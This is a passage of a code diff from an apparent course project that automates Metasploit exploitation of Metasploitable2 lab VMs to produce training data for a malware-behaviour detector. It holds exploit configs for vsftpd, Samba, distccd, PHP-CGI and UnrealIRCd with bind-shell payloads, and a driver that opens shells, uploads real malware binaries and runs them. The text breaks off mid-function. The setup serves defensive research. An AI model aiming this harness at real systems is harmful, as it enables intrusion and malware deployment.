preexisting_sessions=sorted(self._sessions_seen_at_arm),
|
||||
sample=self.sample.name if self.sample else None,
|
||||
sample_kind=self.sample.kind if self.sample else None,
|
||||
sample_sha256=self.sample.sha256 if self.sample else None,
|
||||
workload_profile=self.workload.profile if self.workload else None,
|
||||
)
|
||||
|
||||
def teardown(self) -> None:
|
||||
if self._session_id is not None:
|
||||
try:
|
||||
self.client.session_stop(self._session_id)
|
||||
self.emit("session_killed", session_id=self._session_id)
|
||||
except Exception:
|
||||
log.exception("session.stop on %s", self._session_id)
|
||||
if self._job_id is not None:
|
||||
try:
|
||||
self.client.job_stop(self._job_id)
|
||||
except Exception:
|
||||
log.debug("job.stop on %s (often already gone)", self._job_id)
|
||||
self.client.logout()
|
||||
|
||||
# ---- phase callback -------------------------------------------------
|
||||
|
||||
def set_phase(self, phase: str) -> None:
|
||||
log.info("driver phase -> %s", phase)
|
||||
if phase == "clean":
|
||||
return
|
||||
if phase == "armed":
|
||||
self._fire()
|
||||
elif phase == "infecting":
|
||||
self._await_session()
|
||||
elif phase == "infected_running":
|
||||
self._start_workload()
|
||||
elif phase == "dormant":
|
||||
self._stop_workload()
|
||||
elif phase == "reverting":
|
||||
self.teardown()
|
||||
else:
|
||||
log.warning("unknown phase: %s", phase)
|
||||
|
||||
# ---- actions --------------------------------------------------------
|
||||
|
||||
def _fire(self) -> None:
|
||||
if self._fired:
|
||||
log.debug("module already fired; skipping re-fire")
|
||||
return
|
||||
opts = self.module.render_options(target_ip=self.cfg.target_ip)
|
||||
self.emit(
|
||||
"exploit_fire",
|
||||
module=self.module.module_path,
|
||||
options={k: v for k, v in opts.items() if k != "PASSWORD"},
|
||||
)
|
||||
resp = self.client.module_execute(
|
||||
self.module.module_type, self.module.module_path, opts,
|
||||
)
|
||||
self._job_id = resp.get("job_id")
|
||||
self._fired = True
|
||||
|
||||
def _await_session(self) -> None:
|
||||
if self._session_id is not None:
|
||||
return
|
||||
result = wait_for_new_session(
|
||||
self.client,
|
||||
seen=self._sessions_seen_at_arm,
|
||||
timeout_s=self.cfg.session_open_timeout_s,
|
||||
)
|
||||
if result is None:
|
||||
self.emit(
|
||||
"session_open_timeout",
|
||||
module=self.module.module_path,
|
||||
timeout_s=self.cfg.session_open_timeout_s,
|
||||
)
|
||||
log.warning(
|
||||
"no session opened within %.1fs", self.cfg.session_open_timeout_s,
|
||||
)
|
||||
return
|
||||
sid, info = result
|
||||
self._session_id = sid
|
||||
self.emit(
|
||||
"session_open",
|
||||
session_id=sid,
|
||||
session_type=info.get("type"),
|
||||
tunnel_peer=info.get("tunnel_peer"),
|
||||
)
|
||||
# Landing probe so we have a known-good RTT marker on the wire.
|
||||
try:
|
||||
self.client.session_shell_write(sid, "id")
|
||||
time.sleep(0.5)
|
||||
out = self.client.session_shell_read(sid)
|
||||
self.emit("session_landing_probe", session_id=sid, output=out.strip()[:256])
|
||||
except Exception:
|
||||
log.exception("landing probe on session %s", sid)
|
||||
|
||||
def _start_workload(self) -> None:
|
||||
if self._session_id is None:
|
||||
log.warning("infected_running with no session — skipping workload")
|
||||
return
|
||||
if self._chunked is not None:
|
||||
self._upload_real_binary_chunked()
|
||||
return
|
||||
if self.workload is not None:
|
||||
# Driver v2 — profile-matched mimic workload.
|
||||
self.client.session_shell_write(self._session_id, self.workload.start_cmd)
|
||||
self.emit(
|
||||
"sample_executed",
|
||||
session_id=self._session_id,
|
||||
profile=self.workload.profile,
|
||||
description=self.workload.description,
|
||||
sample=self.sample.name if self.sample else None,
|
||||
)
|
||||
else:
|
||||
# Driver v1 fallback.
|
||||
self.client.session_shell_write(
|
||||
self._session_id,
|
||||
f"nohup sh -c {_shquote(self.cfg.workload_cmd)} </dev/null "
|
||||
f">/dev/null 2>&1 & disown",
|
||||
)
|
||||
self.emit(
|
||||
"sample_executed",
|
||||
session_id=self._session_id,
|
||||
command=self.cfg.workload_cmd,
|
||||
)
|
||||
|
||||
def _upload_real_binary_chunked(self) -> None:
|
||||
"""Walk the ChunkedUpload plan: each chunk is a separate
|
||||
shell_write so msfrpc never sees a buffer-busting payload.
|
||||
Verifies the in-guest sha256 before exec; emits per-step
|
||||
events so we have a wire-level audit trail of Tier-4 runs."""
|
||||
plan = self._chunked
|
||||
assert plan is not None and self._session_id is not None
|
||||
sid = self._session_id
|
||||
|
||||
self.emit(
|
||||
"real_binary_upload_begin",
|
||||
session_id=sid,
|
||||
n_chunks=plan.n_chunks,
|
||||
sha256=plan.expected_sha256,
|
||||
sample=self.sample.name if self.sample else None,
|
||||
)
|
||||
for i, chunk in enumerate(plan.chunks):
|
||||
self.client.session_shell_write(sid, chunk)
|
||||
# Read back so the next write doesn't race ahead of the
|
||||
# previous one's prompt return. We don't parse it.
|
||||
try:
|
||||
self.client.session_shell_read(sid)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Decode + verify on the guest side.
|
||||
self.client.session_shell_write(sid, plan.finalize_cmd)
|
||||
try:
|
||||
verify_out = self.client.session_shell_read(sid)
|
||||
except Exception:
|
||||
verify_out = ""
|
||||
verified = "sha-ok" in verify_out
|
||||
self.emit(
|
||||
"real_binary_verify",
|
||||
session_id=sid,
|
||||
ok=verified,
|
||||
output=verify_out.strip()[:256],
|
||||
sha256=plan.expected_sha256,
|
||||
)
|
||||
if not verified:
|
||||
self.emit("real_binary_aborted", session_id=sid, reason="sha mismatch")
|
||||
return
|
||||
|
||||
# Launch.
|
||||
self.client.session_shell_write(sid, plan.exec_cmd)
|
||||
self.emit(
|
||||
"sample_executed",
|
||||
session_id=sid,
|
||||
profile=plan.profile,
|
||||
sample=self.sample.name if self.sample else None,
|
||||
sha256=plan.expected_sha256,
|
||||
kind="real",
|
||||
)
|
||||
|
||||
def _stop_workload(self) -> None:
|
||||
if self._session_id is None:
|
||||
return
|
||||
if self.workload is not None:
|
||||
self.client.session_shell_write(self._session_id, self.workload.stop_cmd)
|
||||
else:
|
||||
self.client.session_shell_write(
|
||||
self._session_id, self.cfg.workload_kill_cmd,
|
||||
)
|
||||
self.emit(
|
||||
"session_dormant",
|
||||
session_id=self._session_id,
|
||||
profile=self.workload.profile if self.workload else None,
|
||||
)
|
||||
|
||||
|
||||
def _shquote(s: str) -> str:
|
||||
# Minimal POSIX single-quote escaping. The workload command is set
|
||||
# by us, not by anything user-controlled, so we just need to handle
|
||||
# embedded single quotes correctly for completeness.
|
||||
return "'" + s.replace("'", "'\\''") + "'"
|
||||
147
exploits/modules.py
Normal file
147
exploits/modules.py
Normal file
|
|
@ -0,0 +1,147 @@
|
|||
"""TOML loader for exploit-module configs.
|
||||
|
||||
Each ``exploits/modules/*.toml`` describes one Metasploit module — its
|
||||
path, the options to set, the payload to use, and how the driver
|
||||
should treat the resulting session. The driver consumes ``ModuleConfig``
|
||||
objects; the TOML files are the on-disk source of truth.
|
||||
|
||||
Why TOML and not msfconsole ``.rc`` scripts? ``.rc`` scripts are
|
||||
imperative and assume an interactive console; the driver needs the
|
||||
*structured* options to push them through msfrpc. TOML is the simplest
|
||||
way to express a small typed map of options — and it round-trips
|
||||
cleanly into ``meta.json`` for episode reproducibility.
|
||||
|
||||
Per-(host, slot, episode) selection mirrors the sample-manifest
|
||||
selector: we want different vulnerabilities exercised across hosts
|
||||
and waves so the trained model sees a diverse corpus of
|
||||
``armed → infecting`` transition shapes, not just the same FTP
|
||||
backdoor every run.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import tomllib
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
|
||||
_VALID_MODULE_TYPES = {"exploit", "auxiliary", "post"}
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class ModuleConfig:
|
||||
name: str # short id, e.g. "vsftpd_234_backdoor"
|
||||
module_type: str # "exploit" | "auxiliary" | "post"
|
||||
module_path: str # e.g. "unix/ftp/vsftpd_234_backdoor"
|
||||
options: dict[str, Any] = field(default_factory=dict)
|
||||
payload_path: str | None = None # e.g. "cmd/unix/interact"
|
||||
payload_options: dict[str, Any] = field(default_factory=dict)
|
||||
expected_session_type: str = "shell" # what we'll get on success
|
||||
description: str = ""
|
||||
# When true the module's payload uses a callback channel (reverse
|
||||
# or bind shell) and won't land a session under SLIRP+restrict=on.
|
||||
# The fleet runner skips these unless BRIDGE is set so episodes
|
||||
# that fire them actually produce data.
|
||||
requires_bridge: bool = False
|
||||
|
||||
def render_options(self, *, target_ip: str) -> dict[str, Any]:
|
||||
"""Substitute ``{{ target_ip }}`` placeholders in options.
|
||||
|
||||
Module configs use Jinja-style placeholders for any value that
|
||||
isn't known until episode time (RHOSTS, LHOST, etc.). Today the
|
||||
only supported placeholder is ``target_ip``; if more are needed
|
||||
later, generalize here."""
|
||||
out: dict[str, Any] = {}
|
||||
for k, v in self.options.items():
|
||||
if isinstance(v, str) and "{{" in v:
|
||||
out[k] = (
|
||||
v.replace("{{ target_ip }}", target_ip)
|
||||
.replace("{{target_ip}}", target_ip)
|
||||
)
|
||||
else:
|
||||
out[k] = v
|
||||
# MSF requires PAYLOAD as a top-level option even though we
|
||||
# carry it in a separate field on the config.
|
||||
if self.payload_path:
|
||||
out["PAYLOAD"] = self.payload_path
|
||||
for k, v in self.payload_options.items():
|
||||
if isinstance(v, str) and "{{" in v:
|
||||
v = (
|
||||
v.replace("{{ target_ip }}", target_ip)
|
||||
.replace("{{target_ip}}", target_ip)
|
||||
)
|
||||
out[k] = v
|
||||
return out
|
||||
|
||||
|
||||
def load_module_config(path: Path) -> ModuleConfig:
|
||||
raw = tomllib.loads(path.read_text())
|
||||
mod = raw.get("module") or {}
|
||||
module_path = mod.get("path")
|
||||
module_type = mod.get("type", "exploit")
|
||||
if not isinstance(module_path, str) or not module_path:
|
||||
raise ValueError(f"{path}: module.path must be a non-empty string")
|
||||
if module_type not in _VALID_MODULE_TYPES:
|
||||
raise ValueError(
|
||||
f"{path}: module.type {module_type!r} not in {_VALID_MODULE_TYPES}"
|
||||
)
|
||||
options = (raw.get("module", {}).get("options") or {}) | (raw.get("options") or {})
|
||||
payload = raw.get("payload") or {}
|
||||
return ModuleConfig(
|
||||
name=path.stem,
|
||||
module_type=module_type,
|
||||
module_path=module_path,
|
||||
options=dict(options),
|
||||
payload_path=payload.get("path"),
|
||||
payload_options=dict(payload.get("options") or {}),
|
||||
expected_session_type=raw.get("session", {}).get("type", "shell"),
|
||||
description=raw.get("description", ""),
|
||||
requires_bridge=bool(raw.get("runtime", {}).get("requires_bridge", False)),
|
||||
)
|
||||
|
||||
|
||||
def load_module_configs(directory: Path) -> dict[str, ModuleConfig]:
|
||||
"""Load every ``*.toml`` under ``directory``, keyed by short name."""
|
||||
return {
|
||||
p.stem: load_module_config(p)
|
||||
for p in sorted(directory.glob("*.toml"))
|
||||
}
|
||||
|
||||
|
||||
def select_module(
|
||||
catalog: dict[str, ModuleConfig],
|
||||
*,
|
||||
host_id: str,
|
||||
slot: int,
|
||||
episode_index: int,
|
||||
) -> ModuleConfig:
|
||||
"""Deterministic per-(host, slot, ep) module selector. Mirrors
|
||||
SampleManifest.select() so the entry vector rotates the same way
|
||||
the post-infection workload does. Two hosts hash to different
|
||||
modules at the same slot/episode (collision rate ~1/N); a single
|
||||
host walks the full catalog within ~len(catalog) episodes.
|
||||
|
||||
Inputs reduce to a SHA-256 keyed lookup so runs replay
|
||||
bit-identically given the same (host, slot, ep) tuple."""
|
||||
if not catalog:
|
||||
raise ValueError("module catalog is empty")
|
||||
keys = sorted(catalog.keys())
|
||||
seed = f"module|{host_id}|{slot}|{episode_index}".encode()
|
||||
h = hashlib.sha256(seed).digest()
|
||||
idx = int.from_bytes(h[:8], "big") % len(keys)
|
||||
return catalog[keys[idx]]
|
||||
|
||||
|
||||
def module_target_port(module: ModuleConfig) -> int | None:
|
||||
"""Pull the RPORT off a module config. Used by the fleet runner
|
||||
to wire the launcher's hostfwd to the right service inside the
|
||||
target VM (vsftpd:21, samba:139, php-cgi:80, distccd:3632,
|
||||
unrealircd:6667)."""
|
||||
rport = module.options.get("RPORT")
|
||||
if isinstance(rport, int):
|
||||
return rport
|
||||
if isinstance(rport, str) and rport.isdigit():
|
||||
return int(rport)
|
||||
return None
|
||||
36
exploits/modules/distccd_command_exec.toml
Normal file
36
exploits/modules/distccd_command_exec.toml
Normal file
|
|
@ -0,0 +1,36 @@
|
|||
description = """
|
||||
distccd v1 unauthenticated command execution (CVE-2004-2687). The
|
||||
distcc daemon doesn't verify the source of compile jobs, so a
|
||||
crafted DCC_CMD-style request runs an arbitrary command as the
|
||||
distccd user. Metasploitable2 ships distccd 2.18.3 listening on
|
||||
3632. Returns a low-priv shell — paired with a privesc later if
|
||||
needed; for envelope work the unprivileged shell is enough.
|
||||
"""
|
||||
|
||||
[module]
|
||||
type = "exploit"
|
||||
path = "unix/misc/distcc_exec"
|
||||
|
||||
[module.options]
|
||||
RHOSTS = "{{ target_ip }}"
|
||||
RPORT = 3632
|
||||
|
||||
[payload]
|
||||
# Bind shell on a fixed in-guest port. The host hostfwds this port
|
||||
# (see runtime.extra_target_ports) so msfrpcd can connect to it
|
||||
# from the loopback side. Avoids the SLIRP+restrict=on dead-end the
|
||||
# reverse_tcp payload hits.
|
||||
path = "cmd/unix/bind_perl"
|
||||
[payload.options]
|
||||
LPORT = 4444
|
||||
|
||||
[session]
|
||||
type = "shell"
|
||||
|
||||
[runtime]
|
||||
# Reverse/bind callback path → needs the host-only bridge so the
|
||||
# guest can reach the attacker (or the host can reach the bind port
|
||||
# beyond SLIRP's restricted forward). Set BRIDGE=br-malware on the
|
||||
# lab host to enable.
|
||||
requires_bridge = true
|
||||
extra_target_ports = [4444]
|
||||
28
exploits/modules/php_cgi_arg_injection.toml
Normal file
28
exploits/modules/php_cgi_arg_injection.toml
Normal file
|
|
@ -0,0 +1,28 @@
|
|||
description = """
|
||||
PHP-CGI argument injection (CVE-2012-1823). PHP < 5.3.12 in CGI mode
|
||||
treats query-string args as command-line flags, letting a crafted
|
||||
?-d allow_url_include=1 turn any PHP page into a remote-code-exec.
|
||||
Metasploitable2's Apache + php-cgi setup is vulnerable. Returns a
|
||||
shell session on whoever runs Apache.
|
||||
"""
|
||||
|
||||
[module]
|
||||
type = "exploit"
|
||||
path = "multi/http/php_cgi_arg_injection"
|
||||
|
||||
[module.options]
|
||||
RHOSTS = "{{ target_ip }}"
|
||||
RPORT = 80
|
||||
TARGETURI = "/"
|
||||
|
||||
[payload]
|
||||
path = "cmd/unix/bind_perl"
|
||||
[payload.options]
|
||||
LPORT = 4445
|
||||
|
||||
[session]
|
||||
type = "shell"
|
||||
|
||||
[runtime]
|
||||
requires_bridge = true
|
||||
extra_target_ports = [4445]
|
||||
21
exploits/modules/samba_usermap_script.toml
Normal file
21
exploits/modules/samba_usermap_script.toml
Normal file
|
|
@ -0,0 +1,21 @@
|
|||
description = """
|
||||
Samba 3.0.20 username-map command injection (CVE-2007-2447). Trigger
|
||||
is a crafted username at SMB authentication; the Samba daemon shells
|
||||
out via the username_map_script and runs whatever the attacker put in
|
||||
the username. Standard Metasploitable2 vector. Returns a root shell
|
||||
on the SMB socket — works with cmd/unix/interact.
|
||||
"""
|
||||
|
||||
[module]
|
||||
type = "exploit"
|
||||
path = "multi/samba/usermap_script"
|
||||
|
||||
[module.options]
|
||||
RHOSTS = "{{ target_ip }}"
|
||||
RPORT = 139
|
||||
|
||||
[payload]
|
||||
path = "cmd/unix/interact"
|
||||
|
||||
[session]
|
||||
type = "shell"
|
||||
28
exploits/modules/unreal_ircd_3281_backdoor.toml
Normal file
28
exploits/modules/unreal_ircd_3281_backdoor.toml
Normal file
|
|
@ -0,0 +1,28 @@
|
|||
description = """
|
||||
UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075). A modified release
|
||||
shipped to the official mirrors carried a backdoor that runs an
|
||||
arbitrary command on receipt of a magic AB; payload string. Once
|
||||
the backdoor was discovered the official tarball was pulled, but
|
||||
Metasploitable2 still ships the trojaned build. Returns a shell on
|
||||
the IRC user.
|
||||
"""
|
||||
|
||||
[module]
|
||||
type = "exploit"
|
||||
path = "unix/irc/unreal_ircd_3281_backdoor"
|
||||
|
||||
[module.options]
|
||||
RHOSTS = "{{ target_ip }}"
|
||||
RPORT = 6667
|
||||
|
||||
[payload]
|
||||
path = "cmd/unix/bind_perl"
|
||||
[payload.options]
|
||||
LPORT = 4446
|
||||
|
||||
[session]
|
||||
type = "shell"
|
||||
|
||||
[runtime]
|
||||
requires_bridge = true
|
||||
extra_target_ports = [4446]
|
||||
23
exploits/modules/vsftpd_234_backdoor.toml
Normal file
23
exploits/modules/vsftpd_234_backdoor.toml
Normal file
|
|
@ -0,0 +1,23 @@
|
|||
description = """
|
||||
vsftpd 2.3.4 intentional backdoor (CVE-2011-2523). Triggered by an FTP
|
||||
USER name ending with ':)'. Standard Metasploitable2 exploit, fully
|
||||
deterministic — perfect for a Tier-3 first-light run because the
|
||||
exploit fire timing is bounded by a single FTP round-trip.
|
||||
"""
|
||||
|
||||
[module]
|
||||
type = "exploit"
|
||||
path = "unix/ftp/vsftpd_234_backdoor"
|
||||
|
||||
[module.options]
|
||||
RHOSTS = "{{ target_ip }}"
|
||||
RPORT = 21
|
||||
# The exploit returns its own command shell — we drive it with a
|
||||
# minimal cmd/unix/interact payload so the session lands as a plain
|
||||
# shell session usable by session.shell_write/read.
|
||||
|
||||
[payload]
|
||||
path = "cmd/unix/interact"
|
||||
|
||||
[session]
|
||||
type = "shell"
|
||||
231
exploits/msfrpc.py
Normal file
231
exploits/msfrpc.py
Normal file
|
|
@ -0,0 +1,231 @@
|
|||
"""Tiny Metasploit RPC client — just enough for the Tier-3 driver.
|
||||
|
||||
We talk msgpack over HTTPS to ``msfrpcd``. The full MSF RPC surface is
|
||||
huge; this client implements only the verbs we actually call:
|
||||
|
||||
auth.login — get a token
|
||||
auth.logout — release the token
|
||||
module.execute — fire an exploit (or aux) module by name
|
||||
job.list / job.stop — manage the running module
|
||||
session.list — see opened sessions, find the one we just opened
|
||||
session.shell_write/read — run commands in a shell session
|
||||
session.stop — kill a session at episode end
|
||||
|
||||
Why not pull in pymetasploit3? Two reasons:
|
||||
- msfrpcd's protocol is small enough that owning it removes a third-party
|
||||
dep (and a maintenance risk on a course project).
|
||||
- the parts we need (session opening, shell commands, job lifecycle)
|
||||
are simple, and we want full visibility into what's on the wire when
|
||||
debugging an exploit fire.
|
||||
|
||||
The client is intentionally synchronous; the Tier-3 driver runs in the
|
||||
orchestrator's main thread alongside the collector, and a session-open
|
||||
poll of a few hundred milliseconds is well within budget.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import http.client
|
||||
import logging
|
||||
import socket
|
||||
import ssl
|
||||
import time
|
||||
from dataclasses import dataclass
|
||||
from typing import Any
|
||||
|
||||
try:
|
||||
import msgpack # type: ignore[import-untyped]
|
||||
except ImportError as e: # pragma: no cover - import-time guard
|
||||
raise ImportError(
|
||||
"the msgpack package is required for the MSF RPC client. "
|
||||
"install it with: pip install msgpack"
|
||||
) from e
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.msfrpc")
|
||||
|
||||
|
||||
class MSFRpcError(RuntimeError):
|
||||
"""Raised when msfrpcd returns an error or a malformed response."""
|
||||
|
||||
|
||||
@dataclass
|
||||
class MSFRpcConfig:
|
||||
host: str = "127.0.0.1"
|
||||
port: int = 55553
|
||||
user: str = "msf"
|
||||
password: str = ""
|
||||
ssl: bool = True
|
||||
timeout_s: float = 30.0
|
||||
# msfrpcd's default cert is self-signed — most callers will run
|
||||
# against localhost where this is the right tradeoff. Override
|
||||
# explicitly for any non-loopback host.
|
||||
verify: bool = False
|
||||
|
||||
|
||||
class MSFRpcClient:
|
||||
"""Synchronous msfrpcd client. Token is acquired on ``login()`` and
|
||||
re-used on every subsequent call. Not thread-safe; the driver owns
|
||||
one client per episode."""
|
||||
|
||||
def __init__(self, cfg: MSFRpcConfig) -> None:
|
||||
self.cfg = cfg
|
||||
self._token: str | None = None
|
||||
|
||||
# ---- session management --------------------------------------------
|
||||
|
||||
def login(self) -> None:
|
||||
resp = self._call_no_auth("auth.login", self.cfg.user, self.cfg.password)
|
||||
if resp.get("result") != "success" or "token" not in resp:
|
||||
raise MSFRpcError(f"auth.login failed: {resp!r}")
|
||||
self._token = resp["token"]
|
||||
log.info("msfrpc auth.login ok (token=%s...)", self._token[:8])
|
||||
|
||||
def logout(self) -> None:
|
||||
if self._token is None:
|
||||
return
|
||||
try:
|
||||
self._call("auth.logout", self._token)
|
||||
except MSFRpcError as e:
|
||||
log.warning("msfrpc auth.logout: %s", e)
|
||||
finally:
|
||||
self._token = None
|
||||
|
||||
# ---- modules --------------------------------------------------------
|
||||
|
||||
def module_execute(
|
||||
self,
|
||||
module_type: str,
|
||||
module_name: str,
|
||||
options: dict[str, Any],
|
||||
) -> dict[str, Any]:
|
||||
"""Fire a module. Returns ``{"job_id": int, "uuid": str}``."""
|
||||
resp = self._call("module.execute", module_type, module_name, options)
|
||||
if "job_id" not in resp:
|
||||
raise MSFRpcError(f"module.execute returned no job_id: {resp!r}")
|
||||
log.info(
|
||||
"module.execute %s/%s -> job_id=%s uuid=%s",
|
||||
module_type, module_name, resp["job_id"], resp.get("uuid"),
|
||||
)
|
||||
return resp
|
||||
|
||||
# ---- jobs -----------------------------------------------------------
|
||||
|
||||
def job_list(self) -> dict[str, str]:
|
||||
return self._call("job.list")
|
||||
|
||||
def job_stop(self, job_id: int | str) -> dict[str, Any]:
|
||||
# msfrpcd accepts the id as a string.
|
||||
return self._call("job.stop", str(job_id))
|
||||
|
||||
# ---- sessions -------------------------------------------------------
|
||||
|
||||
def session_list(self) -> dict[int, dict[str, Any]]:
|
||||
raw = self._call("session.list")
|
||||
# msfrpcd keys session ids as ints in msgpack but some versions
|
||||
# round-trip them as strings. Normalize.
|
||||
out: dict[int, dict[str, Any]] = {}
|
||||
for k, v in (raw or {}).items():
|
||||
try:
|
||||
out[int(k)] = v
|
||||
except (TypeError, ValueError):
|
||||
pass
|
||||
return out
|
||||
|
||||
def session_shell_write(self, session_id: int, data: str) -> dict[str, Any]:
|
||||
if not data.endswith("\n"):
|
||||
data = data + "\n"
|
||||
return self._call("session.shell_write", session_id, data)
|
||||
|
||||
def session_shell_read(self, session_id: int) -> str:
|
||||
resp = self._call("session.shell_read", session_id)
|
||||
return resp.get("data", "") if isinstance(resp, dict) else ""
|
||||
|
||||
def session_stop(self, session_id: int) -> dict[str, Any]:
|
||||
return self._call("session.stop", session_id)
|
||||
|
||||
# ---- transport ------------------------------------------------------
|
||||
|
||||
def _call(self, method: str, *args: Any) -> dict[str, Any]:
|
||||
if self._token is None:
|
||||
raise MSFRpcError("not authenticated; call login() first")
|
||||
return self._raw_call([method, self._token, *args])
|
||||
|
||||
def _call_no_auth(self, method: str, *args: Any) -> dict[str, Any]:
|
||||
return self._raw_call([method, *args])
|
||||
|
||||
def _raw_call(self, payload: list[Any]) -> dict[str, Any]:
|
||||
body = msgpack.packb(payload, use_bin_type=False)
|
||||
conn = self._open_conn()
|
||||
try:
|
||||
conn.request(
|
||||
"POST",
|
||||
"/api/",
|
||||
body=body,
|
||||
headers={
|
||||
"Content-Type": "binary/message-pack",
|
||||
"Content-Length": str(len(body)),
|
||||
"Connection": "close",
|
||||
},
|
||||
)
|
||||
r = conn.getresponse()
|
||||
raw = r.read()
|
||||
if r.status != 200:
|
||||
raise MSFRpcError(
|
||||
f"msfrpcd HTTP {r.status} for {payload[0]!r}: {raw[:200]!r}"
|
||||
)
|
||||
except (socket.error, http.client.HTTPException) as e:
|
||||
raise MSFRpcError(f"transport error calling {payload[0]!r}: {e}") from e
|
||||
finally:
|
||||
conn.close()
|
||||
|
||||
try:
|
||||
decoded = msgpack.unpackb(raw, raw=False)
|
||||
except Exception as e:
|
||||
raise MSFRpcError(f"could not decode msfrpcd response: {e}") from e
|
||||
|
||||
if isinstance(decoded, dict) and decoded.get("error") is True:
|
||||
raise MSFRpcError(
|
||||
f"{payload[0]!r}: {decoded.get('error_class')} "
|
||||
f"{decoded.get('error_message')}"
|
||||
)
|
||||
if not isinstance(decoded, dict):
|
||||
# session.list and friends can legitimately return {} or a dict,
|
||||
# but never a non-dict — anything else is a protocol violation.
|
||||
raise MSFRpcError(
|
||||
f"unexpected response type for {payload[0]!r}: {type(decoded).__name__}"
|
||||
)
|
||||
return decoded
|
||||
|
||||
def _open_conn(self) -> http.client.HTTPConnection:
|
||||
if self.cfg.ssl:
|
||||
ctx = ssl.create_default_context()
|
||||
if not self.cfg.verify:
|
||||
ctx.check_hostname = False
|
||||
ctx.verify_mode = ssl.CERT_NONE
|
||||
return http.client.HTTPSConnection(
|
||||
self.cfg.host, self.cfg.port,
|
||||
timeout=self.cfg.timeout_s, context=ctx,
|
||||
)
|
||||
return http.client.HTTPConnection(
|
||||
self.cfg.host, self.cfg.port, timeout=self.cfg.timeout_s,
|
||||
)
|
||||
|
||||
|
||||
def wait_for_new_session(
|
||||
client: MSFRpcClient,
|
||||
*,
|
||||
seen: set[int],
|
||||
timeout_s: float,
|
||||
poll_s: float = 0.25,
|
||||
) -> tuple[int, dict[str, Any]] | None:
|
||||
"""Poll ``session.list`` until a session id we haven't seen before
|
||||
appears, or until timeout. Returns ``(session_id, info)`` or None."""
|
||||
deadline = time.monotonic() + timeout_s
|
||||
while time.monotonic() < deadline:
|
||||
sessions = client.session_list()
|
||||
for sid, info in sessions.items():
|
||||
if sid not in seen:
|
||||
return sid, info
|
||||
time.sleep(poll_s)
|
||||
return None
|
||||
346
exploits/workloads.py
Normal file
346
exploits/workloads.py
Normal file
|
|
@ -0,0 +1,346 @@
|
|||
"""Per-sample-profile post-exploit workloads (driver v2).
|
||||
|
||||
The Tier-3 driver lands a session and then needs to drive *something*
|
||||
in that session for the ``infected_running`` phase. Driver v1 ran
|
||||
``yes > /dev/null`` for every sample, which is fine for proving the
|
||||
pipe but is the wrong shape for ML — every Tier-3 episode produces
|
||||
the same envelope regardless of which malware family we said it was.
|
||||
|
||||
Driver v2 maps ``sample.profile`` from the manifest to a distinct
|
||||
in-session workload so each profile's envelope is observably
|
||||
different on every collector:
|
||||
|
||||
cpu-saturate → 1-vCPU saturation, very low IO/net (XMRig shape)
|
||||
scan-and-dial → SYN scans across the bridge IP space + periodic
|
||||
dial-home (Mirai shape)
|
||||
io-walk → fs traversal + random write spikes (ransomware shape)
|
||||
bursty-c2 → long idle, periodic short TCP egress bursts (Dridex)
|
||||
low-and-slow → minimal CPU, periodic memory churn (Kovter)
|
||||
shell-resident → one long-lived TCP socket pinned to a bridge IP,
|
||||
occasional small command bursts (RAT)
|
||||
|
||||
Each profile returns a small shell command that backgrounds a loop
|
||||
inside the session. The driver can stop them by killing the loop's
|
||||
PID file or via a profile-specific kill command.
|
||||
|
||||
This module is intentionally *behaviorally diverse but harmless* —
|
||||
it does NOT execute real malware. Real binaries land via the Tier-4
|
||||
fetch+run path (separate work). What this gives us today is six
|
||||
distinguishable in-guest envelopes the ML model can learn to
|
||||
discriminate between *and* fall back to when a real sample isn't yet
|
||||
staged.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
from dataclasses import dataclass
|
||||
|
||||
from samples.manifest import Sample
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.exploits.workloads")
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Workload:
|
||||
"""A pair of shell commands executable in a Metasploit shell session.
|
||||
|
||||
``start_cmd`` backgrounds a loop and writes its PID to ``pid_path``.
|
||||
``stop_cmd`` kills the loop using that PID file. Both commands are
|
||||
expected to be POSIX-shell compatible and to leave the session in
|
||||
a usable state on completion (return code 0 on the prompt)."""
|
||||
profile: str
|
||||
start_cmd: str
|
||||
stop_cmd: str
|
||||
description: str
|
||||
|
||||
@property
|
||||
def pid_path(self) -> str:
|
||||
return f"/tmp/.cis490-workload-{self.profile}.pid"
|
||||
|
||||
|
||||
def _wrap_loop(name: str, body: str) -> Workload:
|
||||
"""Common pattern: write a small wrapper script that loops ``body``,
|
||||
background it, and stash the wrapper's PID. Stop kills that PID +
|
||||
its child group."""
|
||||
pid_path = f"/tmp/.cis490-workload-{name}.pid"
|
||||
script_path = f"/tmp/.cis490-workload-{name}.sh"
|
||||
# Triple-quote the body into a heredoc so single-quotes inside the
|
||||
# body don't conflict with our outer single-quoting.
|
||||
start = (
|
||||
f"cat > {script_path} <<'CIS490_EOF'\n"
|
||||
f"#!/bin/sh\n"
|
||||
f"trap 'exit 0' TERM INT\n"
|
||||
f"while :; do\n"
|
||||
f"{body}\n"
|
||||
f"done\n"
|
||||
f"CIS490_EOF\n"
|
||||
f"chmod +x {script_path}; "
|
||||
f"nohup sh {script_path} </dev/null >/dev/null 2>&1 &\n"
|
||||
f"echo $! > {pid_path}\n"
|
||||
f"disown\n"
|
||||
)
|
||||
stop = (
|
||||
f"if [ -f {pid_path} ]; then "
|
||||
f" kill -- -$(cat {pid_path}) 2>/dev/null; "
|
||||
f" kill $(cat {pid_path}) 2>/dev/null; "
|
||||
f" rm -f {pid_path} {script_path}; "
|
||||
f"fi; true\n"
|
||||
)
|
||||
return Workload(profile=name, start_cmd=start, stop_cmd=stop,
|
||||
description="(generated)")
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Profile factories — each returns a Workload tuned to that family
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _cpu_saturate() -> Workload:
|
||||
"""XMRig-class — sustained single-vCPU saturation, no IO, no net."""
|
||||
body = " yes > /dev/null 2>&1 &\n wait $!\n"
|
||||
w = _wrap_loop("cpu-saturate", body)
|
||||
return Workload(
